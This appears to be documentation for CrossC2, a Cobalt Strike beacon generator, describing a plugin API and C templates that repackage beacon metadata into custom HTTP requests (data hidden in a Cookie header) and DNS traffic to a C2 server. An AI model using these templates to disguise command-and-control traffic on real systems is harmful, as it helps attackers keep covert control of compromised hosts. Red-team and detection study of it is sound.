Custom communication protocol

CrossC2 reserves the communication protocol API, which can be specified to implement c2profile settings and custom protocols.

Instructions

After writing the corresponding communication protocol implementation, use gcc/clang test.c -fPIC -shared -o lib_rebind_test.so to compile and generate a dynamic library. When generating a beacon, the rebind_dynamic_lib option in cna or genCrossC2 specifies the dynamic library just generated lib_rebind_test.so, and the last generated beacon will send communication packets according to the protocol implementation in the specified dynamic library.

HTTPs communication template modification

Corresponding to the 4 setting options in C2Profile

http-get { 
    client(send) { metadata{} }
    server(recv) { output{} }
}
http-post { 
    client(send) { 
        id {} 
        output {} 
    }
    server(recv) { output{} }
}
void (*cc2_rebind_http_get_send)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_get_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_send)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);

cc2_rebind_http_x_send Series functions: 
    Encapsulate the incoming base64(metadata) data and return the complete HTTP structure data
    `*reqData` Is the data to be requested after base64(metadata field)       - C2Profile http-get { client { (metadata) } } 
    `**outputData` Return the actual HTTP content that needs to be sent

cc2_rebind_http_x_recv Series functions:
    Parse the incoming HTTP structure data and return the base64(output) data
    `*resData` Is the complete HTTP content returned by the server
    `**outputData` Returns the actual content contained in the HTTP content (output field after base64 encoding)     -C2Profile http-get {server {(output)}}

Communication protocol customization

void (*cc2_rebind_get_protocol)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_post_protocol)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);

cc2_rebind_x_protocol Series functions:
    After the incoming original data is sent to and received from the custom communication, the obtained base64(output) data is returned
    `*resData` Is the data to be requested after base64 (metadata field / id + output field)
    `**outputData` It is the server response data(output field) after base64

Ex:

HTTPs communication template customization:


void cc2_rebind_http_get_send(char *reqData, char **outputData, long long *outputData_len) {
    printf("------ custom http get send ------\n");
    char *requestTample = "GET /%s HTTP/1.1\r\n"
        "Host: http.cc2.com\r\n"
        "Accept: gzip, deflate\r\n"
        "User-Agent: cc2_rebind_http_get_send\r\n"
        "Cookie: %s\r\n"
        "Connection: cc2_rebind_http_get_send\r\n\r\n";
    char postPayload[20000];
    sprintf(postPayload, requestTample, "test", reqData);

    // Write the generated HTTP data to outputData
    *outputData_len =  strlen(postPayload);
    *outputData = (char *)calloc(1,  *outputData_len);
    memcpy(*outputData, postPayload, *outputData_len);

    printf("-------------------------\n");
}

void cc2_rebind_http_get_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
    printf("------ custom http get recv ------\n");

    // rawData = "HTTP/1.1 200 OK
    // Date: Tue, 26 May 2020 10:12:28 GMT
    // Server: CC2_server
    // Content-Length: 32
    // Connection: close
    // Content-Type: text/html; charset=iso-8859-1
    //
    // XXXXZZZZXXXXAAAZZ==

    char *payload = find_pay(rawData, rawData_len); // return "XXXXZZZZXXXXAAAZZ=="

    *outputData_len = strlen(payload);
    *outputData = (char *)calloc(1,  *outputData_len);
    memcpy(*outputData, payload, *outputData_len);

    printf("-------------------------\n");
}

Communication protocol customization

void cc2_rebind_get_protocol(char *reqData, char **outputData, long long *outputData_len) {
    printf("------ custom get protocol ------\n");
    sendDNS("127.0.0.1", 53, 1, reqData, strlen(reqData), outputData, outputData_len);
    if (*outputData_len > 0) {
        printf("cobaltstrike cc2_server response(%d): \n", *outputData_len);
    }
    printf("------ custom protocol ------\n");
}

results matching ""

    No results matching ""